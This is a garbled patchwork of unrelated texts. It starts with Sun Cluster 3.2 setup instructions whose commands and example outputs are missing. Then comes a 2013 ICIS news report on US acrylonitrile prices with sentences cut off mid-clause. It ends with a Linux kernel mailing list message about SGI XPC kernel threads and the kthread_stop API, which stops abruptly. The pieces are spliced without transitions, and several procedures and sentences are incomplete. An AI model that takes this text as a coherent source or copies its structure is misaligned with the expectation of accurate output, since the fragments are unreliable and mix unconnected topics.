You can store the file in any directory that is accessible to the other hosts that you will configure as cluster nodes.
Become superuser on the potential node from which you will configure the new cluster.
Modify the cluster configuration XML file as needed.
Open your cluster configuration XML file for editing.
If you are duplicating an existing cluster, open the file that you created with the cluster export command.
If you are not duplicating an existing cluster, create a new file.
Base the file on the element hierarchy that is shown in the clconfiguration(5CL) man page. You can store the file in any directory that is accessible to the other hosts that you will configure as cluster nodes.
Modify the values of the XML elements to reflect the cluster configuration that you want to create.
To establish a cluster, the following components must have valid values in the cluster configuration XML file:
Cluster name
Cluster nodes
Cluster transport
The cluster is created with the assumption that the partition /globaldevices exists on each node that you configure as a cluster node. The global-devices namespace is created on this partition. If you need to use a different file-system name on which to create the global devices, add the following property to the <propertyList> element for each node that does not have a partition that is named /globaldevices.
If you are modifying configuration information that was exported from an existing cluster, some values that you must change to reflect the new cluster, such as node names, are used in the definitions of more than one cluster object.
See the clconfiguration(5CL) man page for details about the structure and content of the cluster configuration XML file.
Validate the cluster configuration XML file.
See the xmllint(1) man page for more information.
From the potential node that contains the cluster configuration XML file, create the cluster.
Specifies the name of the cluster configuration XML file to use as the input source.
For the Solaris 10 OS, verify on each node that multi-user services for the Service Management Facility (SMF) are online.
If services are not yet online for a node, wait until the state becomes online before you proceed to the next step.
On one node, become superuser.
Verify that all nodes have joined the cluster.
Output resembles the following.
For more information, see the clnode(1CL) man page.
Install any necessary patches to support Sun Cluster software, if you have not already done so.
See Patches and Required Firmware Levels in Sun Cluster 3.2 Release Notes for Solaris OS for the location of patches and installation instructions..
To duplicate quorum information from an existing cluster, configure the quorum device by using the cluster configuration XML file.
You must configure a quorum device if you created a two-node cluster. If you choose not to use the cluster configuration XML file to create a required quorum device, go instead to How to Configure Quorum Devices.
If you are using a quorum server for the quorum device, ensure that the quorum server is set up and running.
Follow instructions in Sun Cluster Quorum Server User’s Guide.
If you are using a Network Appliance NAS device for the quorum device, ensure that the NAS device is set up and operational.
Observe the requirements for using a NAS device as a quorum device.
See Requirements, Recommendations, and Restrictions for Network Appliance NAS Devices in Sun Cluster 3.1 - 3.2 With Network-Attached Storage Devices Manual for Solaris OS.
Follow instructions in your device's documentation to set up the NAS device.
Ensure that the quorum configuration information in the cluster configuration XML file reflects valid values for the cluster that you created.
If you made changes to the cluster configuration XML file, validate the file.
Configure the quorum device.
Specifies the name of the device to configure as a quorum device.
Remove the cluster from installation mode.
The following example duplicates the cluster configuration and quorum configuration of an existing two-node cluster to a new two-node cluster. The new cluster is installed with the Solaris 10 OS and is not configured with non-global zones. The cluster configuration is exported from the existing cluster node, phys-oldhost-1, to the cluster configuration XML file clusterconf.xml. The node names of the new cluster are phys-newhost-1 and phys-newhost-2. The device that is configured as a quorum device in the new cluster is d3.
The prompt name phys-newhost-N in this example indicates that the command is performed on both cluster nodes.
Go to How to Verify the Quorum Configuration and Installation Mode.
After the cluster is fully established, you can duplicate the configuration of the other cluster components from the existing cluster. If you did not already do so, modify the values of the XML elements that you want to duplicate to reflect the cluster configuration you are adding the component to. For example, if you are duplicating resource groups, ensure that the <resourcegroupNodeList> entry contains the valid node names for the new cluster, and not the node names from the cluster that you duplicated unless the node names are the same.
To duplicate a cluster component, run the export subcommand of the object-oriented command for the cluster component that you want to duplicate. For more information about the command syntax and options, see the man page for the cluster object that you want to duplicate. The following table lists the cluster components that you can create from a cluster configuration XML file after the cluster is established and the man page for the command that you use to duplicate the component.
16 August 2013 15:54 [Source: ICIS news]
HOUSTON (ICIS)--Demand has not changed for US acrylonitrile (ACN), but spot prices are expected to rise by about $100/tonne (€75/tonne) over the next few weeks on tight supply due to turnarounds, sources said on Friday.
The price rise comes at a good time for producers who are dealing with a 5 cent/lb ($110/tonne) rise in the price of key feedstock propylene.
Sources said Unigel
The plant, which is a joint venture between Unigel and Pemex Petroquimica, was shut down for about six weeks earlier this year for routine maintenance and restarted in mid-April. The facility, in the Morelos petrochemical complex in
The Unigel shutdown will now likely overlap with an INEOS Nitriles turnaround at its
The two shutdowns are expected to reduce supply for a few weeks in late August and early September and cause spot prices to rise by about $100/tonne, sources said.
One producer said it welcomed the price rise to help it cope with the rise in the cost of propylene.
"Without the turnarounds, we couldn't raise prices to counter the rise in propylene," the source said. "The demand is just not there. But this will give us a chance to at least make up some of the margins we're losing on the rise in propylene."
Major producers of US ACN include Ascend Performance Materials, Cornerstone Energy and | http://www.icis.com/Articles/2013/08/16/9698363/us-acn-spot-prices-set-to-rise-amid-turnarounds-sources.html | CC-MAIN-2014-15 | refinedweb | 240 | 65.15 |
On Sun, Apr 27, 2008 at 05:44:46PM +0700, Vladimir Voroshilov wrote: > On Sun, Apr 27, 2008 at 4:56 PM, Diego Biurrun <diego at biurrun.de> wrote: > > On Sun, Apr 27, 2008 at 01:05:07AM +0700, Vladimir Voroshilov wrote: > [...] > > > > + if(pitch_delay_frac < 0) > > > + { > > > > I think Michael prefers braces on the same line. > > All issues except this are fixed. Ummm, no :) > --- /dev/null > +++ b/libavcodec/acelp_filters.c > @@ -0,0 +1,261 @@ > + > + /* The lookup table contain values corresponding containS > + The filtering process uses a negative pitch lag offset, but > + a negative offset should not be used in then table. To avoid > + a negative offset in the table dimension corresponding to > + fractional delay the following conversion applies: delay, > + // Clippin is required to pass G.729 OVERFLOW test ClippinG > --- /dev/null > +++ b/libavcodec/acelp_filters.h > @@ -0,0 +1,125 @@ > + > + * The routine assumes the following order of fractions (X - integer delay): fraction order > + * The routine can be used for 1/3 precision too, by > + * passing 2*pitch_delay_frac as third parameter The routine can be used for 1/3 precision by passing 2*pitch_delay_frac as third parameter. > +/** > + * \brief Calculates coefficients of weighted A(z/weight) filter > + * \param out [out] resulted weighted A(z/weight) > + * filter (-0x8000 <= (3.12) < 0x8000) resulting > + * \remark It is safe to pass the same array in in and out parameters Add a period, could be done in other places as well. > +#endif // FFMPEG_ACELP_FILTERS_H I don't like C++ comments :) Diego | http://ffmpeg.org/pipermail/ffmpeg-devel/2008-April/041178.html | CC-MAIN-2018-05 | refinedweb | 240 | 62.17 |
Expose Your Rails CRUD to the Browser with Databound

By Devdatta Kane
As we go on building more and more JavaScript applications, the need for APIs will go on increasing. Writing a full-fledged API requires quite an amount of planning and time. But sometimes, all we require in an API are just common CRUD actions. Writing CRUD APIs for each and every resource can be quite a tedious and repetitive task. The Ruby community being what it is, some enterprising developers have taken a shot at solving the tedium. Today we will try a gem that will simplify creating these CRUD-based APIs within a Rails application. Let’s get started.
Creating a Rails application
We will create a basic Rails application with a Contact model. The application will use MRI Ruby, Rails 4.2, and SQLite to keep things simple. First of all, install MRI Ruby with RVM or rbenv.
Switch to Ruby and run gem install rails to get the latest Rails gem. Now create a new Rails application, like so:
rails new databound_rails -T
After the application is generated, create a Contact model:
cd databound_rails rails g model Contact name:string address:string city:string phone:string
Migrate the database:
rake db:migrate
Now we have Contact model in place. We will create the CRUD interface later.
Installing Databound
Now we will integrate Databound gem in our Rails application. We will also add ‘lodash-rails’ gem since Databound depends on it. Like so:
gem 'databound', '3.1.3' gem 'lodash-rails', '3.10.1'
We are using the '3.x' version of 'lodash' for compatibility reasons.
Install both gems:
bundle install
Databound comes with a generator to add the required files into our application, so run it:
rails g databound:install
This adds databound.js to our asset pipeline. You’ll need to manually add ‘lodash’ in app/assets/javascripts/application.js, so that it’s picked up by the asset pipeline:
//= require lodash //= require databound
Databound will already be added in application.js, but you need to remember to require 'lodash' before Databound.
Configuring Databound
Let’s use Databound with our Contact model. First, modify config/routes.rb to add Databound routes for Contact model:
Rails.application.routes.draw do databound :contacts end
As you can see, we have added a Databound route for Contact model.
Databound will generate a controller named ContactsController automatically at runtime if it is not found. For simple models, this feature can save the time of writing controllers for each model. We can also specify API accessible columns here, like so:
databound :contacts, columns: [:name, :address, :city, :phone]
But we will create a ContactsController since we will explore more advanced options provided by Databound and hence will configure the columns in the controller itself.
Let’s
ContactsController with following code:
class ContactsController < ApplicationController databound do model :contact columns :name, :address, :city, :phone end end
Here we have defined the model as :contact, along with the columns that are accessible from the API, here instead of doing so in routes.rb. Now when we invoke the API, only these specified columns can be accessed or modified.
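The effect of that whitelist can be sketched in plain Ruby (a simplified illustration with made-up names, not Databound's actual implementation):

```ruby
# Simplified sketch of column whitelisting, not Databound's real code:
# only whitelisted keys survive into the attributes used for create/update.
PERMITTED = [:name, :address, :city, :phone]

def filter_columns(params)
  params.select { |key, _value| PERMITTED.include?(key) }
end

attrs = filter_columns(name: "Devdatta", city: "Pune", admin: true)
p attrs  # the :admin key has been dropped
```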
Building the Frontend
We have our backend ready. Let's create a simple jQuery-powered frontend for testing the API. First, add an action to our ContactsController for showing the Contacts page.
In app/controllers/contacts_controller.rb, add the following:
def index end
You’ll need add a route for that action in config/routes.rb:
get 'contacts' => 'contacts#index'
Create the view for the action in app/views/contacts/index.html.erb with the following code:
<h1>Contacts</h1>

<table border="0">
  <tr>
    <td colspan="2"><h3>Create Contact</h3></td>
  </tr>
  <tr>
    <td><strong>Name:</strong></td>
    <td><input name="txtName" id="txtName" /></td>
  </tr>
  <tr>
    <td><strong>Address:</strong></td>
    <td><input name="txtAddress" id="txtAddress" /></td>
  </tr>
  <tr>
    <td><strong>City:</strong></td>
    <td><input name="txtCity" id="txtCity" /></td>
  </tr>
  <tr>
    <td><strong>Phone:</strong></td>
    <td><input name="txtPhone" id="txtPhone" /></td>
  </tr>
  <tr>
    <td colspan="2" align="center"><button name="createContact" id="createContact">Create Contact</button></td>
  </tr>
</table>

<table border="0" id="tblContacts">
  <thead>
    <th>Name</th>
    <th>Address</th>
    <th>City</th>
    <th>Phone</th>
  </thead>
  <tbody>
  </tbody>
</table>
Here we have created a simple interface to create a new Contact and show it in a table below. Now we will create contacts.js in app/assets/javascripts to bring the view to life:
var Contact = new Databound('/contacts');

$(document).ready(function(){
  $('#createContact').on('click', function() {
    Contact.create({
      name: $('#txtName').val(),
      address: $('#txtAddress').val(),
      city: $('#txtCity').val(),
      phone: $('#txtPhone').val()
    }).then(function(new_contact) {
      var table = $('#tblContacts tbody');
      var row = "<tr>";
      row += "<td>" + new_contact.name + "</td>";
      row += "<td>" + new_contact.address + "</td>";
      row += "<td>" + new_contact.city + "</td>";
      row += "<td>" + new_contact.phone + "</td>";
      row += "</tr>";
      $(table).append(row);
    });
  });
});
We have defined the Contact JavaScript object, which we will be using for invoking CRUD actions on the Contact model:

var Contact = new Databound('/contacts');
Next, there’s a simple event handler for the
createContact button to call
Contact.create, passing along the data from the Name, Address, City and Phone fields. Finally, append the created record to the table.
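The row-building part could be factored into a small pure function so it can be unit-tested without the DOM (an illustrative refactor, not code from the article):

```javascript
// Builds the <tr> markup for one contact; pure, so it is testable
// without jQuery or a browser.
function contactRow(contact) {
  return "<tr>" +
    ["name", "address", "city", "phone"]
      .map(function (field) { return "<td>" + contact[field] + "</td>"; })
      .join("") +
    "</tr>";
}

console.log(contactRow({ name: "A", address: "B", city: "C", phone: "D" }));
// <tr><td>A</td><td>B</td><td>C</td><td>D</td></tr>
```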
Let’s test if this works. Fire up the Rails server:
rails s
Hit http://localhost:3000/contacts and create a few records. Records should be created and be visible in the table.
We have now successfully integrated Databound into our API. Let’s explore the other functions provided by Databound.
Searching API
Databound provides three client-side APIs for searching records. Let’s see them one by one.
where API
Contact.where({ name: 'Devdatta' }).then(function(contacts) { alert('Contacts named Devdatta'); });
Here we are invoking the where API to search for contacts whose name field matches 'Devdatta'. The matching records are returned in the contacts object.
find API
Contact.find(1).then(function(contact) { alert('Contact ID 1: ' + contact.name); });
Here we can find a specific contact by its primary key using the find API. We have passed the primary key '1' and received the relevant record in the contact object.
findBy API
Contact.findBy({ name: 'Devdatta' }).then(function(contact) { alert('Contact named Devdatta from ' + contact.city); });
The findBy API is similar to where, but you can specify only one field to search with. Here we are searching for records whose name field matches 'Devdatta'. The matching record is returned in the contact object.
We can also specify a default scope for searching, using the extra_where_scopes option while initializing the API. Like so:

var Contact = new Databound('/contacts',
  { city: 'Pune' },
  { extra_where_scopes: [{ city: 'Mumbai' }] }
);
Update & Delete API
Databound also provides update and destroy APIs to edit and delete records, respectively.
Update API
Contact.update({ id: 1, name: 'John' }).then(function(contact) { alert("My name has changed. I'm " + contact.name); });
Using Databound’s
update API we can update the record’s fields as specified. Only accessible columns’ data will be updated as specified in the controller. Once updated, the contact object is returned with updated data.
Delete API
Contact.destroy(1).then(function(status) { if (status.success) alert('Contact deleted'); });
Records are deleted using the
destroy API which accepts the primary key of the record as argument and returns the status as true or false.
Permit actions
Databound also allows specifying which actions are permitted based on certain conditions that can be invoked using API. For example:
permit(:update, :destroy) do |params, record|
  record.user_id == current_user.id
end
(Since we have not setup any authentication mechanism in our sample, this won’t work directly in our application)
Wrapping Up
Today we got a short introduction to Databound and how to use it in a Rails application. Many Rubyists may not like the way Databound works, since it binds your frontend code to the database rather tightly. However, there are sometimes cases where simplicity of solution wins over architectural purity. Databound merits a hard look in those kinds of scenarios. It is useful for fast prototyping of APIs and for small applications as well.
Hope you liked the tutorial. | https://www.sitepoint.com/expose-your-crud-to-the-browser-with-databound/?utm_source=sitepoint&utm_medium=relatedsidebar&utm_term=ruby | CC-MAIN-2017-22 | refinedweb | 1,341 | 58.79 |
cout not printing anything?wait I understood now.. I wrote the wrong sign. lol, thanks
cout not printing anything?no, I doubt it's the problem, since if I write something in the console I can see it which means it ...
cout not printing anything?[code]#include <iostream>
using namespace std;
int main () {
for (int x=1;x>9;x++) {
...
For loop reads second parameter as first along with first parameter...Thanks!
For loop reads second parameter as first along with first parameter...So I did a test code for changing colors and stuff, and it compiles right, but I'm having a problem,...
This user does not accept Private Messages | http://www.cplusplus.com/user/cplusplus123/ | CC-MAIN-2015-35 | refinedweb | 111 | 79.26 |
this list, but am looking for a replacement for SquirrelMail,
and IlohaMail looks quite nice. I also like its basic idea behind it.
I'm currently testing it on my webserver, and started with the latest
CVS from SourceForge, also because I'm interested in the GPG feature.
The GPG configuration part said, it would be a complete GPG management
thing with key chain management etc. But when I access that page in my
settings, it first wants to create a new key. I cannot import my current
key at the beginning. So I had it create a key, but half a minute later
(it's a fast machine), it printed some garbage (not a lot, only 3 lines)
in that frame and that's it. Another access to that page and I could
import new public keys. Obviously my generated key wasn't there. Is this
a known thing or so?
Also, when composing new messages, I can select one (out of none, for
now) keys to encrypt to. But what about signing my own e-mail? Is that
done automatically? I mean that would be fine, but there's no indication
about it.
Importing a public key also doesn't work. It prints (in black, as the
garbage above) "Write:", then the normal input form with my public key
in it again. The drop-down list is still empty. 'gpg --list-keys' as
that web user shows an empty list.
Ah, I forgot: PHP 5.1.3/FastCGI with APC enabled. Using file storage for
IlohaMail, that's easier for now. MySQL 4.0 and 5.0 are available. I
could switch down to PHP 4.4/FastCGI or PHP 4.4/CGI for this directory
if required, but am trying to avoid that.
I'll continue testing and see how it runs in a more realistic
environment. But does anybody know right now if it can use PGP/MIME or
will it add those ugly ---BEGIN PGP...--- lines everywhere?
So far, IlohaMail looks good and works really fast. It's a little sad
that development looks ceased for a year now, apart from some
discussions on this list (I quickly browsed the archives). Should I like
it even more, use it in my productive environment and find some time to
look into the source, I probably want to help a little in coding stuff
so that it gets further a little. :)
Regards,
--
Yves Goergen "LonelyPixel" <nospam.list@...> – My web laboratory.
I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details | https://sourceforge.net/p/ilohamail/mailman/message/2528211/ | CC-MAIN-2017-17 | refinedweb | 456 | 76.62 |
"The only hurdle I see really is that I'm not sure if the Arduinos Wire library will work with it."Do you (or anybody else) know if there is another library I could use instead?
//Use Wire Library to do I2C communication #include <Wire.h>
/***** Function to write commands and data to I2C bus ***************************/uint8_t I2C_write(uint8_t command, uint8_t data){ Wire.beginTransmission(AS1130ADDRESS); Wire.write(command); Wire.write(data); int ack = Wire.endTransmission(); #ifdef DEBUG if (ack != 0) { Serial.print("Error: "); Serial.print(ack); Serial.print("\r\n"); } #endif return ack;}
/***** Start-up sequence as per datasheet - see Page 13 ******************************/// (1) define ram configuration - see table 20 page 25// (2) Fill the On/Off Frames with our data// (3) Set-up Blink & PWM sets// (4) Set-up Dot Correction (if required)// (5) Define Control Registers - see table 13 page 20 // (6) Define Current Source (0 to 30mA) - see table 19 page 24// (7) Define Display Options// (8) Start Display (Picture or Movie) Movie takes precedence over Picture
And if I use four AS1130 to build a 11x48 Matrix, how do I have to connect the Sync Pins?1. I'll do it like in the datasheet, on p.32 Figure 27., that there is only one Sync-Pin configured as Sync_Out and the other three AS1130 are Sync_In and then the Sync_Out is connected to the three Sync_In? But that means that the clock speed will decrease?!Therefore I have a 2. solution: To configure every Sync Pin of the four devices as Sync_Out that each of them works (with their own oscillator) independent from the others ?
In the Datasheet is written: "After a first write of data to the frames, the configuration is locked in the AS1130 config register and can be changed only after a reset of the device. A change of the RAM configuration requires to re-write the frame datasets."
thanks
I asked you some questions in my last post hexadec
So of what was funkyguy4000 talking there?
But would the circuit also work if I use four Sync_In Pins and let them work with their own oscillator that they are independant of the other devices clock?
I'm really sorry Hexadec
@funkyguy4000 :Of what were you talking there about that library?
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy | http://forum.arduino.cc/index.php?topic=122138.msg953663 | CC-MAIN-2015-22 | refinedweb | 412 | 69.92 |
This is the fourth in a short series of articles that add Ajax functionality to a Java EE web application developed in the NetBeans IDE.
As discussed in the previous article in this series, the JavaServer Faces technology included in the Java EE platform enables you to create your own custom components, which you can then reuse in different applications. The approach in the previous article required the custom component and its resources to be bundled and distributed with the web application.
This article describes a phase listener approach to building the custom component. In this approach, the component's resources are packaged with the component in a
.jar file that is bundled with the web application. The resources are served through a phase listener on the server. To distinguish this approach from the previous one in the example project, it is called CompB.
As in the previous custom component approach, the CompB custom component generates the JavaScript code needed to handle Ajax interactions with the server. Again, you use the same Java Servlet that was used in the do-it-yourself method.
The client component's resources, such as the JavaScript file and CSS, are accessed through the phase listener. The phase listener approach takes advantage of more of the power of JavaServer Faces technology than did the component approach described in the previous article in this series.
The phase listener can delegate responsibility to a managed bean's method or use a legacy servlet. In this example, you use the legacy servlet. Using the legacy servlet has two major advantages:
The disadvantage of using a legacy servlet is that it does not take advantage of the inherently more capable and robust managed bean approach. For information on how to use a managed bean for server-side processing, see the discussion in Using PhaseListener Approach for Java Server Faces Technology with AJAX and Accessing Resources From JavaServer Faces Custom Components
The CompB (phase listener) approach can be appropriate in the following cases:
The CompB approach also has its shortcomings, namely:
.jarfiles that are registered in all the
faces-config.xmlfiles bundled with your application are fired sequentially, with no guarantee to the order.
Figure 1 shows how resources for the component are accessed from the web container. The cycle begins when the user navigates to the book catalog page.
The steps in Figure 1 are as follows:
CompB.jararchive.
CompB.jararchive, and returns them to the phase listener.
Figure 2 shows how data for a specific pop-up balloon is obtained through the Ajax request.
onmouseoverevent handler.
onmouseoverevent handler calls the
bpui.compB.showPopup()function in the
compB.jsfile. This function sends a request to the
PopupServletthrough the
XMLHttpRequestobject.
PopupServletreceives the request and, using the existing
BookDBAobject, obtains the book title detail data and formats a response to the request.
PopupServletthen returns an XML response that holds the book detail.
ajaxReturnFunction()is called when the response is returned from the
PopupS second implementation of a JavaServer Faces component, you create a component with resources accessed by a servlet. When creating your custom component, you edit the tag library definition file
ui.tld, the JavaServer Faces configuration file
faces-config.xml, the tag handler
CompBTag.java, and the renderer
CompBRenderer.java. You also create a phase listener,
CompBPhaseListener.java. The phase listener is the major difference between the CompA and CompB approaches.
The component CompB has been precompiled into a
.jar file in the project. In the Project window, you can find the file located in the project's bookstore2 > Web Pages > WEB-INF > lib folder. As you examine the source files for CompB, you will open the read-only files in this
.jar file.
The source files used to build
CompB.jar can be seen in the Files window, under the bookstore2 > compB node. The
readme.html file in the
compB folder describes how to compile the source files. In the procedures in this article, you do not edit the source files. Use the files to experiment and as the basis of your own JavaServer Faces components. ComponentB.jsp file already present in the project.
bookcatalog.jspfile.
bookcatalog_compB.jspfile, right-click, and choose Copy from the contextual menu.
booksnode, right-click, and choose Paste from the contextual menu. A copy of the
bookcatalog_compB.jspfile appears in the list.
bookcatalog_comp it is very similar to the version used for Creating an Ajax-Enabled Application, a Component Approach.
The changes in the file appear on lines 33–37, where the
bpui:compB component is identified, along with the servlet that responds to the component's Ajax call:
The
onmouseover and
onmouseout event handlers (lines 78–79) also have changed to reference the CompB versions of the
showPopup() and
hidePopup() functions.
In other ways, the
bookcatalog.jsp page is the same as the CompA version.
Now, examine your project's tag library descriptor (
.tld) file. In the CompB approach, the
ui.tld file is contained in the
CompB.jar file. Open the file in the NetBeans Editor:
ui.tldfile to open it as a read-only file in the NetBeans Editor.
In the
ui.tld file, you see that tags for
CompB lie between lines 13 and 67. The
id,
url,
style, and
styleClass attributes declared in the file are used the same way as the same attributes declared in the
ui.tld file for CompA. One obvious difference is the definition of the
<name> tag (line 15):
The name is used with the taglib namespace prefix
bpui in the
bookcatalog.jsp file.
In the CompB approach, you must put the component's resources in a location that the phase listener can find. When you place the
CompB.jar file in the project's Libraries folder, it is deployed to the
.war file's
WEB-INF/lib directory. This directory is automatically searched by the phase listener when it looks for package resources. This feature enables others to easily use the components you create.
The phase listener itself is registered by means of the
faces-config.xml file.
To view the
faces-config.xml file:
faces-config.xmlto open the file in the NetBeans Editor.
In the
faces-config.xml file, consider lines 12–30, which configure the CompB component.
Lines 15–22 register the name and location of the renderer for the component.
Lines 26–28 register the name and location of the phase listener for the component. The phase listener handles all of the component's requests for resources and methods.
In summary, the file registers the renderer
CompBRenderer and the lifecycle component
CompBPhaseListener. You now examine the major difference between the CompA and CompB approaches: the phase listener.
The JavaServer Faces framework invokes the phase listener every time a request passes through the FacesServlet. The sole responsibility of the phase listener in your project is to serve the resources needed by the component.
The
.java source files have been included in the
compB.jar file. Such inclusion is not typical, but in discussing this example it is convenient to have the source files close to their corresponding classes.
To view
CompBPhaseListener.java:
CompBPhaseListener.javafile to open it in the NetBeans Editor.
Note the
afterPhase() method, beginning on line 55. This method is called by the JavaServer Faces framework at each phase of the lifecycle that is returned by the
getPhaseId() method. In this example, the
afterPhase() method is called during the
PhaseId.RESTORE_VIEW lifecycle phase. In the event that the phase listener is called for on all phases, then the
getPhaseId() method returns
PhaseId.ANY_PHASE, and
afterPhase() is called after every request through the FacesServlet.
In line 60, the
afterPhase() method obtains the application key:
The value of
APP_KEY is set to
/jsf-example/ in line 45. The characters
jsf-example are part of the URL resource path set in
CompBRenderer. This value sets the path to the resources for the component and limits the requests for which the phase listener operates, thus reducing possible side effects to other requests being made through the FacesServlet.
For example, when the
afterPhase() method is passed an event, it notes that the value of
APP_KEY for the event is
/jsf-example/. The method then extracts the root ID (
rootId) of the event. The root ID is the actual URL of the resource that is located in the
compB.jar, as constructed by the renderer
CompBRenderer.
In
CompBPhaseListener.java, the URL for the JavaScript resource that is constructed in the
afterPhase() method in line 65 is:
In the project build, the URL resolves to:
The
if-else statements in lines 64–73 of the
afterPhase() method guarantee that JavaScript, CSS, and image content types are handled properly and can be found by resource consumers. These lines test to see that the application key exists and that the resource URL is one of the types declared in lines 40–44. If the suffix is recognized as a resource,
afterPhase() constructs a relative URL for the resource and passes it to the
handleResourceRequest() method.
The
handleResourceRequest() method (lines 100–127) is straightforward. Line 103 finds the fully qualified URL given the relative URL for the resource:
The
getResource() method allows the servlet container to make a resource available to servlets from any source. Resources can be located on a local or remote file system, in a database, or in a
.war file. For example, the relative URL of the CompB component's JavaScript file is
/jsf-example/compB/compB.js. The
getResource() method finds the resource in a local class path in the project's
.war file, in the path
web/WEB-INF/lib/compB.jar/META-INF/jsf-example/compB/compB.js.
If the resource cannot be found, the
getResource() method returns null, and the
try-catch block in lines 110–119 prints an error message when the
readWriteBinaryUtil() method throws an exception. That method simply reads in the resources.
Note that you, as the component developer, are responsible for creating resources and placing them in the proper locations. After the component has been successfully packaged, it can be used without regard to such details.
So, the
handleResoureRequest() method looks up the resource, composes its full URL, and returns the URL along with the resource content type. Line 112 sets the response status to 200, which indicates that the resource was found successfully. It then opens a stream and puts back a binary stream.
The method that reads and writes the binary stream is
readWriteBinaryUtil(), shown in lines 142–169. The reason to use a stream is because not all resources are character data. The binary stream allows image resource data to be transferred.
As an aside, note that the
images folder that holds the pop-up balloon's corner images are located in the same directory in your project as the
compB.css style sheet. The style sheet finds the images with a relative path name, not a fully qualified one. Thus you will see references to the images in
compB.css like the following (taken from line 3 of the style sheet):
You now examine the way actions are mapped in the phase listener.
JavaServer Faces 1.2 introduced a unified expression language. In line 82, the
afterPhase() method calls the expression factory:
This line creates an expression out of the method for use with a managed bean. In your project you use a legacy servlet rather than a managed bean. For information on how to use a managed bean for server-side processing, see the discussion in Using PhaseListener Approach for Java Server Faces Technology with Ajax.
CompBTagTag Class
You now examine the CompBTag class referenced by the
ui.tld file to see how the pop-up component's tag data is used.
To view
CompBTag.java:
CompBTag.javafile to open it in the NetBeans Editor.
The
CompBTag class extracts attribute values from the tag, populates the component, and maps to a renderer type that is registered in
faces-config.xml. Its function is identical to the
CompATag class in the CompA approach.
getRendererType() method maps the
CompB tag to a renderer type. That renderer type is determined by the
CompBRenderer class.
CompBRendererClass
To see how the
CompBRenderer class executes the rendering, you now examine the
CompBRenderer.java file.
CompBRenderer.javafile to open it in the NetBeans Editor.
In the
CompBRenderer.java file, scroll to lines 45–47 of the
CompBRenderer class definition:
Lines 45–46 show that the class uses the script resources of the
compB.js and
compB.css files. These resources display the HTML markup for the pop-up balloon and provide the information that the balloon displays.
Line 47 shows that the class uses a resource template. Much of the code that was in the
CompARenderer.java file in the previous article is drawn from a template in this example. A resource template is the preferred approach because the component does not need to be recompiled whenever you change the template HTML code. To view the template contents:
compB_template.txt.
Note that the CompA approach could also have made use of a resource template.
Other than renaming instances of CompA to CompB (for example, changing the namespace from
bpui.compA to
bpui.compB), not much is different between the CompA and CompB versions of the renderer.
compB.cssStyle Sheet
The CSS file for the CompB implementation differs only slightly from CompA approach. To view the style sheet contents in the NetBeans Editor:
compB.cssfile.
In the file, note that the class selector namespace has changed to
.bpui_compB. The namespace ensures a unique name for the styles, eliminating the possibility of inadvertent duplication. The name changes are the only difference between the CompB and CompA versions of the style sheet.
Note also that the image file names under the bookstore2 > Web Pages > WEB-INF > lib > compB.jar > META-INF > jsf-example > compB > images node have been changed to begin with
compB_ in order to make them unique.
compB.jsFile
The
compB.js file is almost the same as the
compA.js file. Again, the namespace has changed from
bpui.compA to
bpui.compB. Functionally, the script does exactly the same thing as its CompA counterpart.
Note that, because of the separate namespaces, it would be possible to use both components (CompA and CompB) in the same page.
To view the
compB.js file in the NetBeans Editor:
compB.jsfile.
DispatcherClass
The
Dispatcher class finds known URL patterns, alters them if necessary, and forwards them for further processing. The dispatchers for the CompA and CompB approaches are identical. See the discussion in the previous article for details.
Now, examine the generated HTML markup for the project by building and deploying it.
The HTML code for the deployed page is very similar to that produced in the CompA approach. The only significant differences are the CompB naming conventions and the new URLs of the component resources. For example, in CompB, the JavaScript resource file is:
Whereas, in the CompA version it is:
This series of four articles shows a progression for implementing Ajax functionality in a legacy application:
You can build and deploy the project in the NetBeans IDE using any of these approaches by using the appropriate
bookcatalog.jsp file during the build.
The CompB approach, using a JavaServer Faces phase listener, takes greater advantage of the JavaServer Faces framework than did the CompA approach discussed in the previous article. In the CompB approach, the JavaServer Faces component is compiled into a
.jar file that is placed in the application's
Web Pages/WEB-INF/lib project directory. The component sends Ajax requests to the server and handles the replies. The component can be reused by placing it in the
WEB-INF/lib directory of other projects.
On the server side, Ajax calls are handled by the phase listener, which serves resources for the component. To fulfill the Ajax request on the server side, the phase listener requests data from the legacy servlet that was used with the original application. When building an application from scratch, you would more likely use a managed bean instead of a servlet.
In some circumstances, the use of a JavaServer Faces component with a phase listener degrades performance because the phase listener is called on every request through the FacesServlet. In the example that has been the subject of these articles, the performance penalty is minimal because Ajax requests occur infrequently.
Other advantages of the CompB approach are the same as those of CompA, namely:
bookcatalog.jspfile and return to your original application, affecting only one page.
Check the Hands-On Java EE page for a follow-on article that describes state management with JavaServer Faces technology. Managing application state exploits the full capabilities of JavaServer Faces technology. | http://www.oracle.com/technetwork/articles/javaee/compb-141697.html | CC-MAIN-2015-22 | refinedweb | 2,785 | 57.27 |
Dean Nelson <dcn@sgi.com> writes:>> Christoph is correct in that XPC has a single thread that exists throughout> its lifetime, another set of threads that exist for the time that active> contact with other XPCs running on other SGI system partitions exists, and> finally there is a pool of threads that exist on an as needed basis once> a channel connection has been established between two partitions.>> In principle I approve of the kthread API and its use as opposed to what> XPC currently does (calls kernel_thread(), daemonize(), wait_for_completion(),> and complete()). So Christoph's patch that changes the single long-lived> thread to use kthread_stop() and kthread_should_stop() is appreciated.>> But the fact that another thread, started at the xpc_init() time, that does> discovery of other SGI system partitions wasn't converted points out a> weekness in either my thinking or the kthread API. This discovery thread> does its job and then exits. Should XPC be rmmod'd while the discovery> thread is still running we would need to do a kthread_stop() against it. > But kthread_stop() isn't set up to deal with a task that has already exited.> And if what once was the task structure of this exited task has been> reallocated to another new task, we'd end up stopping it should it be> operating under the kthread API, or possibly waiting a very long time> for it to exit if it is not.Patches are currently under development to allow kthreads to exitbefore kthread_stop is called. The big thing is that once we allowkernel threads that exited by themselves to be reaped by kthread_stopwe have some significant work to do.> I'm also a little uneasy that kthread_stop() has an "only one thread can> stop another thread at a time" design. 
